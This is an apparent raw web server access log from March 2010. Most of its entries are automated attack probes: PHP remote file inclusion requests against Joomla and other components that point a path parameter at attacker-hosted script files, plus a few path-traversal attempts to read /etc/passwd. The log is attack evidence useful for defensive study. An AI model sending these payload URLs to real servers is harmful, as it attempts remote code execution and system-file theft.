116.127.121.117 - - [04/Mar/2010:04:21:11 -0800] "GET /logs/access_100128.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.formationalliance.com/images/id1.txt???????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:04:21:11 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.formationalliance.com/images/id1.txt???????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:04:21:11 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.formationalliance.com/images/id1.txt???????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:04:21:14 -0800] "GET /logs/access_100204.log///admnistrator/components/com_virtuemart/admin.virtuemart.html.php?msConfig.absolute.path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:04:21:24 -0800] "GET /logs/access_100126.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.formationalliance.com/images/id1.txt???????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:04:21:26 -0800] "GET //admnistrator/components/com_virtuemart/admin.virtuemart.html.php?msConfig.absolute.path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:04:21:26 -0800] "GET /logs/access_100226.log///admnistrator/components/com_virtuemart/admin.virtuemart.html.php?msConfig.absolute.path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:04:21:27 -0800] "GET /logs///admnistrator/components/com_virtuemart/admin.virtuemart.html.php?msConfig.absolute.path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.249.18.67 - - [04/Mar/2010:04:21:43 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://thegodlike.com/modules/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.249.18.67 - - [04/Mar/2010:04:21:43 -0800] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://thegodlike.com/modules/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.249.18.67 - - [04/Mar/2010:04:21:43 -0800] "GET /logs/access_100217.log%20%20//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://thegodlike.com/modules/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [04/Mar/2010:04:21:55 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://thegodlike.com/modules/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [04/Mar/2010:04:21:55 -0800] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://thegodlike.com/modules/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [04/Mar/2010:04:21:55 -0800] "GET /logs/access_100217.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://thegodlike.com/modules/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:04:22:04 -0800] "GET /logs///admnistrator/components/com_virtuemart/admin.virtuemart.html.php?msConfig.absolute.path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:04:22:04 -0800] "GET //admnistrator/components/com_virtuemart/admin.virtuemart.html.php?msConfig.absolute.path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:04:22:04 -0800] "GET /logs/access_100226.log///admnistrator/components/com_virtuemart/admin.virtuemart.html.php?msConfig.absolute.path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.249.18.67 - - [04/Mar/2010:04:22:08 -0800] "GET /logs/access_100203.log%20%20//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://thegodlike.com/modules/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [04/Mar/2010:04:22:09 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://thegodlike.com/modules/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [04/Mar/2010:04:22:09 -0800] "GET /logs/access_100223.log%20%20//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://thegodlike.com/modules/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [04/Mar/2010:04:22:09 -0800] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://thegodlike.com/modules/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.126.35.98 - - [04/Mar/2010:04:22:09 -0800] "GET /logs/access_100128.log//bbs/move_update.php?board_skin_path=http://demo.njipn.com//idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [04/Mar/2010:04:22:11 -0800] "GET /logs/access_100203.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://thegodlike.com/modules/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [04/Mar/2010:04:22:14 -0800] "GET /logs/access_100217.log%20%20//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://thegodlike.com/modules/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:04:22:14 -0800] "GET //admnistrator/components/com_virtuemart/admin.virtuemart.html.php?msConfig.absolute.path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:04:22:14 -0800] "GET /logs///admnistrator/components/com_virtuemart/admin.virtuemart.html.php?msConfig.absolute.path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:04:22:14 -0800] "GET /logs/access_100226.log%20%20///admnistrator/components/com_virtuemart/admin.virtuemart.html.php?msConfig.absolute.path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:04:22:15 -0800] "GET /logs/access_100212.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.formationalliance.com/images/id1.txt???????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [04/Mar/2010:04:22:16 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://thegodlike.com/modules/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [04/Mar/2010:04:22:16 -0800] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://thegodlike.com/modules/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [04/Mar/2010:04:22:16 -0800] "GET /logs/access_100217.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://thegodlike.com/modules/COPYME.TXT?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.249.18.67 - - [04/Mar/2010:04:22:22 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://thegodlike.com/modules/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.249.18.67 - - [04/Mar/2010:04:22:22 -0800] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://thegodlike.com/modules/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [04/Mar/2010:04:22:22 -0800] "GET /logs/access_100203.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://thegodlike.com/modules/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.249.18.67 - - [04/Mar/2010:04:22:22 -0800] "GET /logs/access_100217.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://thegodlike.com/modules/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:04:22:23 -0800] "GET /logs///admnistrator/components/com_virtuemart/admin.virtuemart.html.php?msConfig.absolute.path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:04:22:23 -0800] "GET /logs/access_100226.log///admnistrator/components/com_virtuemart/admin.virtuemart.html.php?msConfig.absolute.path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:04:22:23 -0800] "GET //admnistrator/components/com_virtuemart/admin.virtuemart.html.php?msConfig.absolute.path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:04:22:33 -0800] "GET //admnistrator/components/com_virtuemart/admin.virtuemart.html.php?msConfig.absolute.path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:04:22:33 -0800] "GET /logs///admnistrator/components/com_virtuemart/admin.virtuemart.html.php?msConfig.absolute.path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:04:22:33 -0800] "GET /logs/access_100226.log%20%20///admnistrator/components/com_virtuemart/admin.virtuemart.html.php?msConfig.absolute.path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.249.18.67 - - [04/Mar/2010:04:22:35 -0800] "GET /logs/access_100203.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://thegodlike.com/modules/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:04:22:55 -0800] "GET /logs/access_100128.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.formationalliance.com/images/id1.txt???????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:04:22:55 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.formationalliance.com/images/id1.txt???????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:04:22:55 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.formationalliance.com/images/id1.txt???????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:04:22:55 -0800] "GET /logs/access_100126.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.formationalliance.com/images/id1.txt???????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.249.18.67 - - [04/Mar/2010:04:23:29 -0800] "GET /logs/access_100217.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://thegodlike.com/modules/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.249.18.67 - - [04/Mar/2010:04:23:30 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://thegodlike.com/modules/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.249.18.67 - - [04/Mar/2010:04:23:30 -0800] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://thegodlike.com/modules/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.249.18.67 - - [04/Mar/2010:04:23:35 -0800] "GET /logs/access_100203.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://thegodlike.com/modules/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:04:23:44 -0800] "GET /logs/access_100204.log///admnistrator/components/com_virtuemart/admin.virtuemart.html.php?msConfig.absolute.path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:04:25:07 -0800] "GET //admnistrator/components/com_virtuemart/admin.virtuemart.html.php?msConfig.absolute.path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:04:25:08 -0800] "GET /logs/access_100226.log///admnistrator/components/com_virtuemart/admin.virtuemart.html.php?msConfig.absolute.path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:04:25:08 -0800] "GET /logs///admnistrator/components/com_virtuemart/admin.virtuemart.html.php?msConfig.absolute.path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:04:25:16 -0800] "GET /logs/access_100204.log%20%20///admnistrator/components/com_virtuemart/admin.virtuemart.html.php?msConfig.absolute.path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:04:25:24 -0800] "GET /logs/access_100204.log%20%20///admnistrator/components/com_virtuemart/admin.virtuemart.html.php?msConfig.absolute.path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.208.46.145 - - [04/Mar/2010:04:27:45 -0800] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://www.karavi.net/components/com_banners/banner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.208.46.145 - - [04/Mar/2010:04:27:45 -0800] "GET /modules/agendax/addevent.inc.php?agendax_path=http://www.karavi.net/components/com_banners/banner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.208.46.145 - - [04/Mar/2010:04:27:45 -0800] "GET /logs/access_100129.log%20%20//modules/agendax/addevent.inc.php?agendax_path=http://www.karavi.net/components/com_banners/banner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:04:27:57 -0800] "GET /logs/access_100225.log%20%20///admnistrator/components/com_virtuemart/admin.virtuemart.html.php?msConfig.absolute.path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.201.180.130 - - [04/Mar/2010:04:28:07 -0800] "GET /admin/functions/PhpCommander/upload.php?Directory=./&sort=NomASC&action=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 5258 "-" "-" "www.puaga.com"
200.201.180.130 - - [04/Mar/2010:04:28:11 -0800] "GET /admin/functions/PhpCommander/upload.php?Directory=./&sort=NomASC&action=./../../../../../../../../etc/passwd HTTP/1.1" 404 5258 "-" "-" "www.puaga.com"
123.143.29.250 - - [04/Mar/2010:04:28:28 -0800] "GET /logs//inc/header.php/step_one.php?server_inc=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [04/Mar/2010:04:28:28 -0800] "GET /logs/access_100130.log%20%20//inc/header.php/step_one.php?server_inc=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [04/Mar/2010:04:28:28 -0800] "GET /inc/header.php/step_one.php?server_inc=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.114 - - [04/Mar/2010:04:28:41 -0800] "GET /logs//components//com_cpg/cpg.php?mosConfig_absolute_path=http://www.surfnebraska.net/york/albums/data/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.114 - - [04/Mar/2010:04:28:41 -0800] "GET /components//com_cpg/cpg.php?mosConfig_absolute_path=http://www.surfnebraska.net/york/albums/data/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.114 - - [04/Mar/2010:04:28:42 -0800] "GET /logs/access_100226.log%20%20//components//com_cpg/cpg.php?mosConfig_absolute_path=http://www.surfnebraska.net/york/albums/data/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:04:28:48 -0800] "GET /logs/access_100128.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.formationalliance.com/images/id1.txt???????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [04/Mar/2010:04:28:48 -0800] "GET /logs/access_100130.log%20%20//inc/header.php/step_one.php?server_inc=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [04/Mar/2010:04:28:48 -0800] "GET /logs//inc/header.php/step_one.php?server_inc=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [04/Mar/2010:04:28:48 -0800] "GET /inc/header.php/step_one.php?server_inc=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:04:29:00 -0800] "GET /logs/access_100126.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.formationalliance.com/images/id1.txt???????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.6.222.71 - - [04/Mar/2010:04:29:05 -0800] "GET /logs/access_100226.log//errors.php?error=http://www.new-vision.com.pl/cmdu.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
123.143.29.250 - - [04/Mar/2010:04:29:08 -0800] "GET /logs/access_100130.log//inc/header.php/step_one.php?server_inc=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.6.222.71 - - [04/Mar/2010:04:29:08 -0800] "GET /errors.php?error=http://www.new-vision.com.pl/cmdu.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
61.6.222.71 - - [04/Mar/2010:04:29:09 -0800] "GET /logs//errors.php?error=http://www.new-vision.com.pl/cmdu.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:04:29:23 -0800] "GET /logs/access_100126.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.formationalliance.com/images/id1.txt???????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [04/Mar/2010:04:29:24 -0800] "GET /logs/access_100130.log//inc/header.php/step_one.php?server_inc=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.114 - - [04/Mar/2010:04:29:30 -0800] "GET /logs//components//com_cpg/cpg.php?mosConfig_absolute_path=http://www.surfnebraska.net/york/albums/data/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.114 - - [04/Mar/2010:04:29:30 -0800] "GET /components//com_cpg/cpg.php?mosConfig_absolute_path=http://www.surfnebraska.net/york/albums/data/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.114 - - [04/Mar/2010:04:29:30 -0800] "GET /logs/access_100226.log//components//com_cpg/cpg.php?mosConfig_absolute_path=http://www.surfnebraska.net/york/albums/data/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.111.3.35 - - [04/Mar/2010:04:29:39 -0800] "GET /inc/header.php/step_one.php?server_inc=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.111.3.35 - - [04/Mar/2010:04:29:39 -0800] "GET /logs/access_100130.log%20%20//inc/header.php/step_one.php?server_inc=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.111.3.35 - - [04/Mar/2010:04:29:39 -0800] "GET /logs//inc/header.php/step_one.php?server_inc=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.6.222.71 - - [04/Mar/2010:04:29:44 -0800] "GET /logs/access_100210.log//errors.php?error=http://www.new-vision.com.pl/cmdu.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
219.94.194.248 - - [04/Mar/2010:04:29:52 -0800] "GET /logs//administrator/components//com_cpg/cpg.php?mosConfig_absolute_path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [04/Mar/2010:04:29:52 -0800] "GET /administrator/components//com_cpg/cpg.php?mosConfig_absolute_path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [04/Mar/2010:04:29:59 -0800] "GET /logs/access_100226.log%20%20//administrator/components//com_cpg/cpg.php?mosConfig_absolute_path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.112.232 - - [04/Mar/2010:04:30:03 -0800] "GET /logs/access_100215.log HTTP/1.0" 200 1725574 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:04:30:03 -0800] "GET /logs/access_100126.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.formationalliance.com/images/id1.txt???????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:04:30:06 -0800] "GET /logs/access_100128.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.formationalliance.com/images/id1.txt???????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:04:30:07 -0800] "GET /logs/access_100126.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.formationalliance.com/images/id1.txt???????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.254.172.27 - - [04/Mar/2010:04:30:10 -0800] "GET /administrator/components//com_cpg/cpg.php?mosConfig_absolute_path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.254.172.27 - - [04/Mar/2010:04:30:10 -0800] "GET /logs/access_100226.log%20%20//administrator/components//com_cpg/cpg.php?mosConfig_absolute_path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.254.172.27 - - [04/Mar/2010:04:30:10 -0800] "GET /logs//administrator/components//com_cpg/cpg.php?mosConfig_absolute_path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.126.254.112 - - [04/Mar/2010:04:30:22 -0800] "GET /logs/?board_skin_path=http://www.noin9191.com/ams/ammember/auto1.txt??? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.puaga.com"
209.126.254.112 - - [04/Mar/2010:04:30:22 -0800] "GET /logs/access_100222.log/?board_skin_path=http://www.noin9191.com/ams/ammember/auto1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.126.254.112 - - [04/Mar/2010:04:30:22 -0800] "GET /?board_skin_path=http://www.noin9191.com/ams/ammember/auto1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
61.111.3.35 - - [04/Mar/2010:04:30:25 -0800] "GET /logs/access_100130.log//inc/header.php/step_one.php?server_inc=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.114 - - [04/Mar/2010:04:30:52 -0800] "GET /logs/access_100222.log//components//com_cpg/cpg.php?mosConfig_absolute_path=http://www.surfnebraska.net/york/albums/data/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
112.76.72.3 - - [04/Mar/2010:04:30:53 -0800] "GET /logs//inc/header.php/step_one.php?server_inc=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
112.76.72.3 - - [04/Mar/2010:04:30:53 -0800] "GET /inc/header.php/step_one.php?server_inc=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
112.76.72.3 - - [04/Mar/2010:04:30:53 -0800] "GET /logs/access_100130.log%20%20//inc/header.php/step_one.php?server_inc=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:04:30:54 -0800] "GET /logs/access_100212.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.formationalliance.com/images/id1.txt???????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.126.254.112 - - [04/Mar/2010:04:30:57 -0800] "GET /logs/access_100202.log/?board_skin_path=http://www.noin9191.com/ams/ammember/auto1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [04/Mar/2010:04:31:10 -0800] "GET /logs/access_100222.log%20%20//administrator/components//com_cpg/cpg.php?mosConfig_absolute_path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.114 - - [04/Mar/2010:04:31:30 -0800] "GET /logs/access_100222.log%20%20//components//com_cpg/cpg.php?mosConfig_absolute_path=http://www.surfnebraska.net/york/albums/data/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:04:32:10 -0800] "GET /logs/access_100126.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.formationalliance.com/images/id1.txt???????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [04/Mar/2010:04:32:42 -0800] "GET /logs/access.log//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.leaderpmc.com/banner/id.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
